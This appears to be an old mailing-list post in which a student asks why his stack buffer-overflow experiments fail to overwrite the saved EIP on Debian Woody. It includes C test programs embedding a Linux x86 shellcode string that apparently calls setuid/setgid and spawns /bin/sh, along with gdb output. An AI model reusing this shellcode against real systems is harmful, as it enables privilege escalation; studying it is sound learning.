problem with RET & debian debuggin'

["BORJA RUIZ CASTRO MORON, ESCUELA TÉCNICA SUPERIOR DE INFORMÁTICA" <padre () fedro ugr es>]

Hi, Im playing with this lazy code,and I got surprised because debugging
I see some strange behavours: 


#include <stdio.h> 

main (){ 

char foo[8];
int i;
char shellcode[] =
"\x31\xc0\xb0\x31\xcd\x80\x93\x31\xc0\xb0\x17\xcd\x80\x68\x59\x58\xff\xe1"
"\xff\xd4\x31\xc0\x99\x89\xcf\xb0\x2e\x40\xae\x75\xfd\x89\x39\x89\x51\x04"
"\x89\xfb\x40\xae\x75\xfd\x88\x57\xff\xb0\x0b\xcd\x80\x31\xc0\x40\x31\xdb"
"\xcd\x80/"
"/bin/sh"
"0"; 

for (i=0;i<8+16;i+=4)
 foo[i]=&shellcode; 

} 

With this simply code we I want overwrite ebp & eip.
ebp addr should be foo+8 and eip addr foo+12.
Compile with -g option and fire up gdb. 

lobillo@Sion:~$ gcc -g -o prueba1 prueba1.c
prueba1.c: In function 'main':
prueba1.c:16: warning: assignment makes integer from pointer without a cast
lobillo@Sion:~$ gdb -q prueba1
(gdb) r
Starting program: /home/lobillo/prueba1 

Program received signal SIGILL, Illegal instruction.
0x400361cf in __libc_start_main () from /lib/libc.so.6
(gdb) i r ebp eip
ebp            0xbffffacc       0xbffffacc
eip            0x400361cf       0x400361cf
(gdb) quit
A debugging session is active.
Do you still want to close the debugger?(y or n)
lobillo@Sion:~$ 

mmmmmm first thing we take look around and see that ebp and eip contents
differents addresses.
why? I think overwrited was theorical implemented but notice that gdb doesnt
think the same xD. 

< foo >< ebp >< eip >
8      8      8
|      |      |
|------|------|------> &shellcode 


Well,lets see by eip was overwrited,buy ebp was sucessfully overwrited? lets
modify the code: 

#include <stdio.h> 

main (){ 

char foo[8];
int i;
char shellcode[] =
"\x31\xc0\xb0\x31\xcd\x80\x93\x31\xc0\xb0\x17\xcd\x80\x68\x59\x58\xff\xe1"
"\xff\xd4\x31\xc0\x99\x89\xcf\xb0\x2e\x40\xae\x75\xfd\x89\x39\x89\x51\x04"
"\x89\xfb\x40\xae\x75\xfd\x88\x57\xff\xb0\x0b\xcd\x80\x31\xc0\x40\x31\xdb"
"\xcd\x80/"
"/bin/sh"
"0"; 

for (i=0;i<8+16;i+=4)
 foo[i]=0xbffffabc; 

} 


lobillo@Sion:~$ gcc -g -o prueba2 prueba2.c
prueba1.c: In function 'main':
prueba1.c:16: warning: overflow in implicit constant conversion
lobillo@Sion:~$ gdb -q prueba2 

(gdb) r
Starting program: /home/lobillo/prueba2 

Program received signal SIGSEGV, Segmentation fault.
0x40034370 in _dl_pagesize () from /lib/libc.so.6
(gdb) i r ebp eip
ebp            0xbffffabc       0xbffffabc
eip            0x40034370       0x40034370
(gdb) quit
A debugging session is active.
Do you still want to close the debugger?(y or n)
lobillo@Sion:~$ 

Yep,ebp overwrited but what about eip? lets investigate... 

#include <stdio.h> 

main (){ 

char foo[8];
int i;
char shellcode[] =
"\x31\xc0\xb0\x31\xcd\x80\x93\x31\xc0\xb0\x17\xcd\x80\x68\x59\x58\xff\xe1"
"\xff\xd4\x31\xc0\x99\x89\xcf\xb0\x2e\x40\xae\x75\xfd\x89\x39\x89\x51\x04"
"\x89\xfb\x40\xae\x75\xfd\x88\x57\xff\xb0\x0b\xcd\x80\x31\xc0\x40\x31\xdb"
"\xcd\x80/"
"/bin/sh"
"0"; 

for (i=8;i<16;i+=4)
 foo[i]=0xbffffabc; 

} 

Looking the code,we notice that the -for- will overwrite only eip,by jumping
ebp.Lets see what gdb thinks... 

lobillo@Sion:~$ gcc -g -o prueba3 prueba3.c
prueba1.c: In function 'main':
prueba1.c:16: warning: overflow in implicit constant conversion
lobillo@Sion:~$ gdb -q prueba3 

(gdb) r
Starting program: /home/lobillo/prueba3 

Program received signal SIGSEGV, Segmentation fault.
0x40034370 in _dl_pagesize () from /lib/libc.so.6
(gdb) i r ebp eip
ebp            0xbffffabc       0xbffffabc
eip            0x40034370       0x40034370
(gdb) quit
A debugging session is active.
Do you still want to close the debugger?(y or n)
lobillo@Sion:~$ 


!!!!! ebp is 0xbffffabc? eps,guys this is because i wrote all this shit.
I dont understand why eip is not being overwrited and ebp is so strange :P 

Im coding under Debian Woody 3.0,and i notice that Debians have severals
differences debugging than others
distros,its true? 

Thanks and sorry for my pour english :P